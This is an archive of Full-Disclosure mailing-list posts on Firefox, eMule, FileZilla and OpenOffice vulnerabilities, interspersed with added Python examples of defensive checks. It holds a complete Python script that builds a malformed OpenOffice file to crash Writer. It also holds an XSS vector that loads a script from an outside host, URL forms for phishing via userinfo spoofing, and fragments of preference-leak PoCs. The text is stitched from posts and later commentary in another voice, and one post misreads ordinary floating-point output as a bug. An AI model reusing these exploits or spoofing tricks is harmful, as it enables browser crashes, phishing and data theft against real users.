[Full-disclosure] Firefox 3.0.8 remote DoS: 0-day exploit

2009-04-04 Thread carl hardwick
I found an unpatched vulnerability in the latest Firefox 3.0.8 that allows
a remote attacker to cause a DoS.
A 0-day exploit is available here:
http://carl-hardwick.googlegroups.com/web/Firefox+3.0.8+DoS.htm?gda=i_oPfkcAAACkS-ZCh60y1HGkG90OfxntdaCvR5MIFXIiKOQt5O80jPqLKEFpBrbag3mOAa49_d8xnmtLTzx06f-L8nRUL3egeV4duv6pDMGhhhZdjQlNAw&gsc=HORKjws1umYfXMbeoe6wr8IrMRRv

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Firefox 3.0.5 remote vulnerability via queryCommandState

2009-01-07 Thread carl hardwick
An unpatched security flaw has been discovered in the latest version
of Firefox 3.0.5 which allows a remote attacker to crash the browser
with a specially crafted HTML page using queryCommandState:

PoC: http://groups.google.it/group/carl-hardwick/web/Firefox305RemoteDoS.htm


[Full-disclosure] new unpatched security flaw found Firefox 3.0.4

2008-12-16 Thread carl hardwick
New unpatched security flaw found in Firefox 3.0.4
PoC here: https://bugzilla.mozilla.org/attachment.cgi?id=302699


[Full-disclosure] Flaw in eMule 0.49: it exposes the OS user account name when it sends the shared files list

2008-07-14 Thread carl hardwick
eMule 0.49 and previous versions could expose the OS user account name
when it sends the shared files list.
When a user asks for the shared files list of another user, the full
paths of the folders are sent and they're fully visible in the eMule log.
Example:
Requesting shared files from 'yohan'
User yohan (1507...) shares directory 'C:\Documents and
Settings\Jean-Denis\My documents\...'

OS user account name Jean-Denis is visible and could be used in further attacks.

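The leak above is a path-disclosure problem: the client advertises an absolute path, and on Windows an absolute path under the profile directory carries the account name. The example below is added here and is not eMule's code; it shows the two sides a defender cares about, a log scan that flags advertised directories which reveal an account name, and the label a client should send instead (the shared folder's own name). The profile-root patterns (the "Documents and Settings" layout quoted in the post and the later "Users" layout) are my assumption about what such paths look like, and the peer ids in the sample log are constructed.

```python
import re

# Per-user profile roots on Windows. The post shows the XP-era layout
# ("Documents and Settings"); "Users" is the later layout. Assumption: these
# two patterns cover the paths a client is likely to advertise.
PROFILE_ROOTS = (
    re.compile(r"^[A-Za-z]:\\Documents and Settings\\([^\\]+)\\", re.IGNORECASE),
    re.compile(r"^[A-Za-z]:\\Users\\([^\\]+)\\", re.IGNORECASE),
)

# eMule-style log line as quoted in the post (peer id in parentheses).
SHARE_LINE = re.compile(r"^User (\S+) \([^)]*\) shares directory '([^']*)'")


def profile_owner(path):
    """Return the OS account name embedded in a Windows path, or None if the
    path does not lie under a per-user profile directory."""
    for pattern in PROFILE_ROOTS:
        match = pattern.match(path)
        if match:
            return match.group(1)
    return None


def share_label(path):
    """What a client should advertise instead of the full path: only the name
    of the shared folder itself, which carries no account information."""
    return path.rstrip("\\").rsplit("\\", 1)[-1]


def leaked_accounts(log_lines):
    """Scan eMule-style log lines and return (peer, account, path) for every
    advertised directory that reveals a Windows account name."""
    leaks = []
    for line in log_lines:
        match = SHARE_LINE.match(line)
        if not match:
            continue
        peer, path = match.groups()
        account = profile_owner(path)
        if account is not None:
            leaks.append((peer, account, path))
    return leaks


# Constructed sample log, modelled on the lines quoted in the post.
SAMPLE_LOG = [
    "Requesting shared files from 'yohan'",
    r"User yohan (1507) shares directory 'C:\Documents and Settings\Jean-Denis\My documents\Incoming'",
    r"User alice (2231) shares directory 'D:\Shared\Music'",
]

if __name__ == "__main__":
    for peer, account, path in leaked_accounts(SAMPLE_LOG):
        print("%s exposes account %r via %s; advertise %r instead"
              % (peer, account, path, share_label(path)))
```

Run against the sample log it reports only the first peer: `D:\Shared\Music` is outside any profile directory and is not flagged, while the XP-style path yields the account name `Jean-Denis` and the label `Incoming` that would have been safe to send.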

[Full-disclosure] Flaw in Firefox 3.0: protocol-handler.warn-external are ignored

2008-06-18 Thread carl hardwick
These protocol-handler security settings are ignored even though they're
set to 'true', and no warnings are shown:

network.protocol-handler.warn-external.mailto
network.protocol-handler.warn-external.news
network.protocol-handler.warn-external.nntp
network.protocol-handler.warn-external.snews
(in about:config)

For example,
I set network.protocol-handler.warn-external.mailto to 'true', clicked
on an e-mail link and Windows Mail is launched without any warnings
(tested on Firefox 3.0 on Windows Vista SP1)


[Full-disclosure] Security issue in Filezilla 3.0.9.2: passwords are stored in plain text (sitemanager.xml)

2008-04-18 Thread carl hardwick
A security issue in Filezilla 3.0.9.2 (and previous versions) allows
local users to retrieve all saved passwords because they're stored in
plain text in sitemanager.xml:

ftpspace.domain.com
21
0
0
1
[EMAIL PROTECTED]
I'mAPlainTextPassword

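The values quoted above are the contents of one `<Server>` entry with the surrounding XML stripped by the archive. As an added example (not FileZilla's code and not part of the post), here is an audit that walks a sitemanager.xml and reports, per saved site, whether the password is absent, stored as-is, or merely base64-encoded. The element names (`FileZilla3` > `Servers` > `Server` > `Host`, `Port`, `Protocol`, `Type`, `Logontype`, `User`, `Pass`, with an optional `encoding="base64"` attribute on `Pass`) are my assumption about the FileZilla 3 layout; the sample document is constructed, with the host taken from the post and the users and passwords made up.

```python
import xml.etree.ElementTree as ET

# Constructed sitemanager.xml (element names assumed from the FileZilla 3 layout).
SAMPLE_SITEMANAGER = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3>
  <Servers>
    <Server>
      <Host>ftpspace.domain.com</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <Logontype>1</Logontype>
      <User>webmaster</User>
      <Pass>I'mAPlainTextPassword</Pass>
    </Server>
    <Server>
      <Host>sftp.example.net</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <Type>0</Type>
      <Logontype>1</Logontype>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
    </Server>
    <Server>
      <Host>mirror.example.org</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <Logontype>0</Logontype>
      <User>anonymous</User>
    </Server>
  </Servers>
</FileZilla3>
"""


def audit_sitemanager(xml_text):
    """Return (host, user, storage) for each saved site, where storage is
    'plain', 'base64' or 'none'. Both 'plain' and 'base64' hand the password
    to anyone who can read the file: base64 is an encoding, not a protection."""
    root = ET.fromstring(xml_text)
    report = []
    for server in root.iter("Server"):
        host = server.findtext("Host", "")
        user = server.findtext("User", "")
        pw = server.find("Pass")
        if pw is None or not (pw.text or "").strip():
            storage = "none"
        elif pw.get("encoding") == "base64":
            storage = "base64"
        else:
            storage = "plain"
        report.append((host, user, storage))
    return report


def exposed_sites(xml_text):
    """Hosts whose credentials any local reader of the file can recover."""
    return [host for host, _user, storage in audit_sitemanager(xml_text)
            if storage in ("plain", "base64")]


if __name__ == "__main__":
    for host, user, storage in audit_sitemanager(SAMPLE_SITEMANAGER):
        print("%-22s %-10s password storage: %s" % (host, user, storage))
```

The point of treating the base64 form the same as plain text is that file-permission exposure is the actual risk here: whatever encoding the client applies, a local user who can read the file has the credential. A fix on the client side needs either a user-supplied master secret or the operating system's credential store, not a different encoding.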

[Full-disclosure] Firefox 2.0.0.12 IFrame overflow vulnerability

2008-02-15 Thread carl hardwick
Firefox 2.0.0.12 IFrame overflow vulnerability

PoC here:
http://carl-hardwick.googlegroups.com/web/Firefox2.0.0.12IFrameDoS.htm?gda=4JPX1k0rdYnIsP_RGVzLBfeWBaUmJHMhbJyqNDyI290QuyyeUGG1qiJ7UbTIup-M2XPURDQ_Vb1oK3VK3gLweoqlIdXNbMjh5chVoSCmWxyNoTvcEg


[Full-disclosure] Firefox URI Spoofing Revisited

2008-02-10 Thread carl hardwick
http://www.0x00.com/

I talked about this before in a previous post. Mozilla pointed me to a
flaw, and I went back to investigate it some more. It turns out that
I'm right after all, but in a different setting, with the same
idea. The below vector can be used to trick filters or surfers into
performing various things. One of them is to steal cookies from
surfers who think that the URI we give them is legit, or to phish for
credentials by setting up a cloned GMail page. This is due to the
empty user name: http://:[EMAIL PROTECTED] Normally, when you fill in
the user name like http://foo:[EMAIL PROTECTED] it will give a
warning, which it should. But without a user name it won't give us a
warning, thereby tricking Firefox into stripping the whole part before
the at-sign and going to the domain after the at-sign. This can be
dangerous in some ways, because of the unknown potential it holds.
Triggering or bypassing RegEx filters that only look for a white-listed
domain are some of the possibilities. Anyway, I thought it was worth
mentioning.

Here we can trick users into triggering a XSS on stumbleupon:

http://:[EMAIL PROTECTED]/create_campaign.php?url=">http://www.0x00.com/x.js><"

To obfuscate it, one can encode it or put a lot of spaces between:

http://:www.gmail.com@phishdomain


[Full-disclosure] Firefox 2.0.0.12 information leak vulnerability

2008-02-09 Thread carl hardwick
Don't blame the extension developers this time :)

You probably thought otherwise after they just released version
2.0.0.12 a couple of hours ago, which had a fix for numerous other
vulnerabilities. But guess what? We are going to see 2.0.0.13 pretty
soon, I guess. I snared at Mozilla before: don't patch vulnerabilities
for fifty percent; take the time and fix the cause. Because directory
traversal through plugins is all nice and such, but we don't need it. We
can trick Firefox itself into traversing directories back. I found
another information leak that is very serious, because we are able to
read out all preferences set in Firefox, or just open or include about
every file stored in the Mozilla program files directory, and this
without any mandatory settings or plugins.

In the vulnerability we make use of the 'view-source:' scheme that
allows us to source out the 'resource:' scheme. With it, we can view
the source of any file located in the 'resource:///' directory, which
translates back to: file:///C:/Program Files/Mozilla Firefox/. Then we
only include the file inside it and it becomes available to a new
page's DOM, and so we are able to read all settings.

Other issues can emerge also; this is only a short-hand proof of
concept. Like always, more is possible. While chatting with Gareth
Heyes, I came up with the vector in a couple of minutes. We talked
about more issues which we probably are going to discuss very soon.



/*
 @name: Firefox <= 2.0.0.12 information leak pOc
 @date: Feb. 07 2008
 @author: Ronald van den Heetkamp
 @url: http://www.0x00.com
*/

pref = function(a,b) {

   document.write( a + ' -> ' + b + '
'); };

[Full-disclosure] Firefox 2.0.0.12 SSL Spoofing and Domain Guessing vulnerabilities

2008-02-04 Thread carl hardwick
Firefox seems to have trouble with defining the proper hostname when
requesting a ssl connection. I was able to trick Firefox in thinking
the hostname behind the at-sign is legit and the same as the URI that
requested an ssl connection, and this without a warning.

PoC: https://[EMAIL PROTECTED]

You can add as much garbage between .com and the @ sign.

So what else can we do?

PoC:
[EMAIL PROTECTED]
[EMAIL PROTECTED]

ah heck we don't need that at all:
[EMAIL PROTECTED]

works fine also :)

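Both this post and the earlier "Firefox URI Spoofing Revisited" post rest on the same parsing fact: everything between `//` and `@` in the authority is userinfo, so the host the browser connects to (and validates the TLS certificate against) is whatever follows the `@`. A filter that only searches the URL for a white-listed domain name is therefore fooled, while anything that parses the URL first is not. The example below is added here and is not Firefox's code nor the poster's; it contrasts such a naive substring filter with a check on the parsed host, and flags the empty-user-name form the earlier post describes. The allow-list, the filter regex and the `phishdomain` host are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit

# A "find the white-listed domain somewhere in the authority" filter of the
# kind the posts say can be fooled. Constructed; not any real product's rule.
NAIVE_ALLOW = re.compile(r"^https?://[^/]*\bgmail\.com", re.IGNORECASE)

# Hosts the policy actually intends to permit (constructed).
ALLOWED_HOSTS = {"www.gmail.com", "gmail.com"}


def naive_filter_allows(url):
    """Substring-style check: passes any URL whose authority contains gmail.com,
    including ones where that string sits in the userinfo."""
    return NAIVE_ALLOW.match(url) is not None


def effective_host(url):
    """The host the browser really connects to. urlsplit() strips userinfo
    (everything before the last '@' in the authority) just as a browser does."""
    return (urlsplit(url).hostname or "").lower()


def classify(url, allowed_hosts=ALLOWED_HOSTS):
    """Decide on the parsed host and report why a URL looks like a spoof."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    findings = []
    if "@" in parts.netloc:
        user = parts.username or ""
        password = parts.password or ""
        if user == "":
            findings.append("empty user name before '@'")
        else:
            findings.append("userinfo present in URL")
        if "." in user or "." in password:
            findings.append("userinfo looks like a host name: %r" % (user or password))
    return {"host": host, "allowed": host in allowed_hosts, "findings": findings}


if __name__ == "__main__":
    samples = [
        "https://www.gmail.com/mail",                       # legitimate
        "http://:www.gmail.com@phishdomain",                # form quoted in the earlier post
        "https://www.gmail.com.secure-login@phishdomain",   # constructed: "garbage" before the '@'
    ]
    for url in samples:
        verdict = classify(url)
        print("%-48s naive=%-5s host=%-14s allowed=%-5s %s"
              % (url, naive_filter_allows(url), verdict["host"],
                 verdict["allowed"], "; ".join(verdict["findings"])))
```

For the SSL case the same rule decides what the certificate is matched against: the parsed host is `phishdomain`, so a valid certificate for that name satisfies the browser regardless of what precedes the `@`. The defensive lesson is to normalise with a real URL parser before any allow-list comparison and to treat a URL carrying userinfo, especially with an empty user name, as suspicious on its own.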

[Full-disclosure] Firefox 2.0.0.11 Chrome Privilege Escalation PoC

2008-01-22 Thread carl hardwick
Gerry Eisenhaur came with a surprising post:
http://www.hiredhacker.com/2008/01/19/firefox-chrome-url-handling-directory-traversal/
Gerry found an issue in Firefox that allows chrome privilege
escalation. This is due to weak normalization between URIs that are
handled and passed through Firefox with various path encoding methods.
It's a common mistake in browser software not to translate encoded
values back to their correct values and meaning. I wrote about the
same kind of issue before, that only involved a non-malicious example
of traversing directories through the resource:// pointer. This one by
Gerry is far worse, and I really hope browser vendors take a little
more care in handling any resource identifier internally, because this
can lead to serious issues.

Gerry released a pOc that requires the downbar plugin:
pref = function(x, y){document.write(x + ' -> ' + y +
'
');};

[Full-disclosure] Firefox 2.0.0.11 File Focus Stealing vulnerability

2007-12-01 Thread carl hardwick
Firefox 2.0.0.11 File Focus Stealing vulnerability:

Sorry Mozilla, but the recent file focus fix was not enough. I think
Mozilla made another mistake while fixing the previous file/label
issue. Because now I embed a file field and a textfield inside one
label. When this happens, and you type only one time in the textfield,
the focus travels to the file field and the value travels with it.
Back to the drawing board I would say. I only got it to work in
Firefox, Gareth checked Safari for me, and it also works in Safari. I
guess this type of exploit could function on other HTML objects as
well, and could be very dangerous because it only requires a one time
focus in a textfield.

PoC here:
http://carl-hardwick.googlegroups.com/web/Firefox20011StealFocusFlaw.htm


[Full-disclosure] Firefox 2.0.0.9 remote DoS vulnerability

2007-11-02 Thread carl hardwick
A new flaw discovered in the latest Firefox 2.0.0.9 allows a remote
attacker to crash the browser, causing a DoS.

PoC here: http://www.0x00.com/lab/t.html


[Full-disclosure] Firefox 2.0.0.7 has a very serious calculation bug

2007-09-28 Thread carl hardwick
There's a flaw in Firefox 2.0.0.7 that allows javascript to execute wrong
subtractions.

PoC here:
javascript:5.2-0.1
(copy this code into address bar)

Firefox 2.0.0.7 result: 5.1005 (WRONG!)
Internet Explorer 7 result: 5.1 (OK)


[Full-disclosure] Firefox 2.0.0.6 still vulnerable to URI flaw

2007-09-06 Thread carl hardwick
http://xs-sniper.com/blog/2007/09/01/firefox-file-handling-woes/

Nate and I have discovered a way to "…exploit a common handler with
a single unexpected URI…"  Once again, these URI payloads can be
passed by the mailto, nntp, news, and snews URIs, allowing us to pass
the payload without any user interaction.  So, it seems that although
the conditions which allowed for remote command execution in Firefox
2.0.0.5 have been addressed with a security patch, the underlying file
type handling issues which are truly the heart of the issue have NOT
been addressed.

We contacted Mozilla a while ago about the issue and they are
working on it.  We're going to refrain from giving out the exact
details of how this particular issue is executed (based mainly on the
efforts and conversations we've had with Jesse Ruderman), but we'll
include a screenshot of a payload in action.  In the screenshot below,
we use the mailto URI, which passes the URI to the Windows File
Handler, which calls the appropriate program (in this case Windows
Scripting Host), which in turn calls our attacker controlled file.
We've purposely pointed the Windows Scripting Host to a file that
doesn't exist as the error message allows the user to see that WSH is
using the URI passed from Firefox.

PoC here: http://xs-sniper.com/blog/wp-content/uploads/2007/09/file-handling.jpg


[Full-disclosure] Found a lot of sites exploiting Firefox URI vulnerability!!! - part 2

2007-08-14 Thread carl hardwick
Daniel, you have to use an Italian IP, because this is Gromozon.
All sites are active and they're exploiting the Firefox URI vulnerability.
If you try to visit these sites with IE7, a new Firefox instance is
launched with the exploit.


[Full-disclosure] Firefox 2.0.0.6 Remote Variable Leakage vulnerability

2007-08-12 Thread carl hardwick
Firefox Remote Variable Leakage

It is possible to read all variables that are set inside Firefox.
That's right: ALL variables and registered objects that are present
inside Javascript files and on runtime. It's even possible to call
certain functions. That ranges from local Mozilla config files to all
extensions registered inside Firefox. The example below will show you
a list of a couple variables that were set. Note: it is possible to
actively scan variables and hijack them when you need to. I've tested
this against my own Firefox extension called: Fire Encrypter. And I
was able to steal a dynamically generated password successfully.

PoC here: http://www.0x00.com/hacks/firefox/variables.html


[Full-disclosure] Firefox Remote Variable Leakage vulnerability

2007-08-12 Thread carl hardwick
Firefox Remote Variable Leakage

It is possible to read all variables that are set inside Firefox.
That's right: ALL variables and registered objects that are present
inside Javascript files and on runtime. It's even possible to call
certain functions. That ranges from local Mozilla config files to all
extensions registered inside Firefox. The example below will show you
a list of a couple variables that were set. Note: it is possible to
actively scan variables and hijack them when you need to. I've tested
this against my own Firefox extension called: Fire Encrypter. And I
was able to steal a dynamically generated password successfully.

PoC here: http://www.0x00.com/hacks/firefox/variables.html


Re: [Full-disclosure] Firefox 2.0.0.6 Java Pop-Up DoS flaw

2007-08-01 Thread carl hardwick
@Daniel Veditz
IE6 SP2 and IE7 are not affected!


[Full-disclosure] Firefox 2.0.0.6 Java Pop-Up DoS flaw

2007-08-01 Thread carl hardwick
A flaw in Firefox 2.0.0.6 allows opening multiple Java pop-up windows
without any possibility of closing them. This could cause a DoS,
and the user has to close the browser in order to continue browsing
in peace.

PoC here: 
http://carl-hardwick.googlegroups.com/web/Firefox2.0.0.6JavaPopUpDoS.htm


[Full-disclosure] Firefox 2.0.0.5 flaw allows to steal the user's passwords

2007-07-21 Thread carl hardwick
Firefox 2.0.0.5 flaw allows stealing the user's passwords

PoC here: 
http://www.heise-security.co.uk/services/browsercheck/demos/moz/pass1.shtml


[Full-disclosure] New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities

2007-06-30 Thread carl hardwick
PoC here: http://yathong.googlepages.com/FirefoxFocusBug.html

The vulnerability allows the attacker to silently redirect the focus of
selected key press events to an otherwise protected file upload form
field. This is possible because of how the onKeyDown event is handled,
allowing the focus to be moved between the two. This enables the
attacker to read arbitrary files on the victim's system.


[Full-disclosure] New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities

2007-06-30 Thread carl hardwick
New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities:
This demo is very simple. When you input some text in the textarea,
the file input element's value will also change to it. I tested it on
Firefox 1.5.0.12 and 2.0.0.4.

PoC here: http://yathong.googlepages.com/FirefoxFocusBug.html

credits by - Hong


[Full-disclosure] 6 Month Vista Vuln Report, Debunked

2007-06-29 Thread carl hardwick
http://www.ubuntulive.com/cs/ubuntu/view/e_spkr/3455
Kristian Hermansen
he served as President and later Vice President of the local Linux User Group

ROTFL


[Full-disclosure] Firefox 2.0.0.4 0day local file reading flaw

2007-05-31 Thread carl hardwick
Firefox 2.0.0.4 is still vulnerable to 0day local file reading
Proof of Concept: http://larholm.com/misc/ffresourcefile.html


[Full-disclosure] OpenOffice.org 2.2.0 Writer DoS vulnerability

2007-05-27 Thread carl hardwick
import sys
import time

print ""
print " OpenOffice.org 2.2.0 Writer Denial of Service  "
print " url: http://www.openoffice.org/"
print ""
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org "
print " site: http://shinnai.altervista.org"
print ""
print " If you want, you can change the file extension in .doc "
print ""

# 512-byte OLE2 compound-file header (signature D0 CF 11 E0 A1 B1 1A E1,
# 512-byte sectors, directory at sector 0x2A) followed by only 40 bytes of
# stream data, so the sectors the header points to are missing from the file.
exploit = \
"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00\x00\x00\x00\x00\x00"+\
"\x00\x00\x00\x00\x00\x00\x00\x00\x3E\x00\x03\x00\xFE\xFF\x09\x00"+\
"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+\
"\x2A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+\
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xEC\xA5\xC1\x00\x23\x60\x10\x04\x00\x00\xF0\x12\xBF\x00\x00\x00"+\
"\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06\x00\x00\x01\x08\x00\x00"+\
"\x0E\x00\x62\x6A\x62\x6A\x35\x47\x35\x47"

while 1:
    print "   OPTIONS  "
    print " 1 -> Create file exploit.otp   "
    print " 2 -> Quit\n"
    print ""

    choice = 0

    # Read the menu choice until it is 1 or 2.
    while 1:
        try:
            choice = int(raw_input("Make your choice: "))
            if choice != 1 and choice != 2:
                print "ehm... Invalid choice...\n"
            else:
                break
        except:
            print "ehm... Invalid choice...\n"

    if choice == 1:
        flag = 1
        try:
            fileOut = open('exploit.otp','w')
            fileOut.write(exploit)
            fileOut.close()
            print "File created!\nBe safe!"
        except:
            print "Unable to create file."

    if choice == 2:
        print "Be safe!"
        time.sleep(2)
        sys.exit()

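The bytes the script writes are a well-formed 512-byte compound-file (OLE2/CFB) header whose fields point at sectors that the file never contains: it declares one FAT sector (at sector 0, via the first DIFAT slot), a directory at sector 42 and a mini-stream cutoff of 0, and then ends after 40 bytes of what looks like the start of a Word FIB. A reader that trusts those header fields and walks to the referenced sectors is what falls over. The example below is added here and is not OpenOffice.org's code nor the poster's; it is a header-level validator that refuses a file whose header references sectors beyond the end of the file, tested on a constructed well-formed file and on a constructed file shaped like the one above. The header field offsets follow the compound-file layout as I know it (sector shift at 0x1E, FAT count at 0x2C, first directory sector at 0x30, mini-stream cutoff at 0x38, DIFAT array at 0x4C); both sample files are built in code rather than copied from the post.

```python
import struct

CFB_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
HEADER_SIZE = 512
FREESECT = 0xFFFFFFFF
ENDOFCHAIN = 0xFFFFFFFE
FATSECT = 0xFFFFFFFD


def check_cfb(data):
    """Sanity-check a compound-file header against the file that carries it.
    Returns a list of findings; an empty list means every sector the header
    points at actually exists. Only header- and FAT-level checks are done."""
    findings = []
    if len(data) < HEADER_SIZE:
        return ["file is shorter than the 512-byte header"]
    if data[:8] != CFB_MAGIC:
        return ["missing compound-file signature"]
    _minor, major, byte_order, sector_shift, mini_shift = struct.unpack_from("<5H", data, 0x18)
    (_n_dir, n_fat, first_dir, _txn, mini_cutoff,
     _first_minifat, _n_minifat, _first_difat, _n_difat) = struct.unpack_from("<9I", data, 0x28)
    if byte_order != 0xFFFE:
        findings.append("byte-order mark is 0x%04X, expected 0xFFFE" % byte_order)
    if (major, sector_shift) not in ((3, 9), (4, 12)):
        findings.append("sector shift %d does not fit major version %d" % (sector_shift, major))
        return findings  # sector size unknown; later bounds checks would be meaningless
    if mini_shift != 6:
        findings.append("mini sector shift is %d, expected 6" % mini_shift)
    if mini_cutoff != 0x1000:
        findings.append("mini stream cutoff is 0x%X, expected 0x1000" % mini_cutoff)
    sector_size = 1 << sector_shift
    body = len(data) - HEADER_SIZE
    sectors_present = body // sector_size
    if body % sector_size:
        findings.append("%d trailing bytes do not form a whole sector" % (body % sector_size))
    if first_dir >= sectors_present:
        findings.append("directory sector %d is beyond the end of the file (%d sectors present)"
                        % (first_dir, sectors_present))
    # The first 109 FAT sector numbers live in the header's DIFAT array.
    difat = [s for s in struct.unpack_from("<109I", data, 0x4C) if s != FREESECT]
    if len(difat) != min(n_fat, 109):
        findings.append("header declares %d FAT sectors but the DIFAT lists %d" % (n_fat, len(difat)))
    for sect in difat:
        if sect >= sectors_present:
            findings.append("FAT sector %d is beyond the end of the file" % sect)
    return findings


def build_header(first_dir, n_fat=1, difat0=0, mini_cutoff=0x1000):
    """Constructed 512-byte version-3 header with one FAT sector in the DIFAT."""
    hdr = bytearray(HEADER_SIZE)
    hdr[:8] = CFB_MAGIC
    struct.pack_into("<5H", hdr, 0x18, 0x3E, 3, 0xFFFE, 9, 6)
    struct.pack_into("<9I", hdr, 0x28, 0, n_fat, first_dir, 0, mini_cutoff,
                     ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    struct.pack_into("<109I", hdr, 0x4C, difat0, *([FREESECT] * 108))
    return bytes(hdr)


def well_formed_sample():
    """Header + FAT at sector 0 + directory at sector 1 (constructed; the
    directory sector is left empty because the checker does not parse it)."""
    fat = struct.pack("<128I", FATSECT, ENDOFCHAIN, *([FREESECT] * 126))
    return build_header(first_dir=1) + fat + bytes(512)


def truncated_sample():
    """Constructed file with the same shape as the one the PoC writes: the
    directory is declared at sector 42 and the FAT at sector 0, but only 40
    bytes follow the header (the first bytes resemble a Word FIB, 0xA5EC)."""
    return build_header(first_dir=42, mini_cutoff=0) + b"\xEC\xA5\xC1\x00" + bytes(36)


if __name__ == "__main__":
    for name, sample in (("well-formed", well_formed_sample()), ("truncated", truncated_sample())):
        print("%s: %s" % (name, check_cfb(sample) or ["ok"]))
```

The truncated sample produces four findings (mini-stream cutoff, trailing bytes, directory sector out of range, FAT sector out of range); any one of the two out-of-range findings is enough for a loader to reject the file before it touches sector data. The same bounds check belongs in any parser that follows sector or offset fields read from an untrusted file.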

[Full-disclosure] OpenOffice.org 2.2.0 Writer DoS vulnerability

2007-05-27 Thread carl hardwick
OpenOffice.org 2.2.0 Writer DoS vulnerability
PoC: http://www.shinnai.altervista.org/exploits/openofficewriter.py


[Full-disclosure] Firefox 2.0.0.3 Out-of-bounds memory access via specially crafted html file

2007-05-01 Thread carl hardwick
Product: Firefox 2.0.0.3
Description: Out-of-bounds memory access via specially crafted html file
Type: Remote

Vulnerability can be exploited by using a large value in a href tag to
create an out-of-bounds memory access.

Proof Of Concept exploit:
http://www.critical.lt/research/opera_die_happy.html


[Full-disclosure] Firefox 2.0.0.3 non-existent applet DoS flaw

2007-04-30 Thread carl hardwick
Firefox 2.0.0.3 is unable to handle multiple requests for a non-existent
applet, so after some page refreshes it crashes or stops responding.
You can try this exploit here: www.shinnai.altervista.org/nea.html but,
if so, you need a little patience 'cause it's much slower than local
exploitation.


[Full-disclosure] Firefox 2.0.0.3 DoS crash

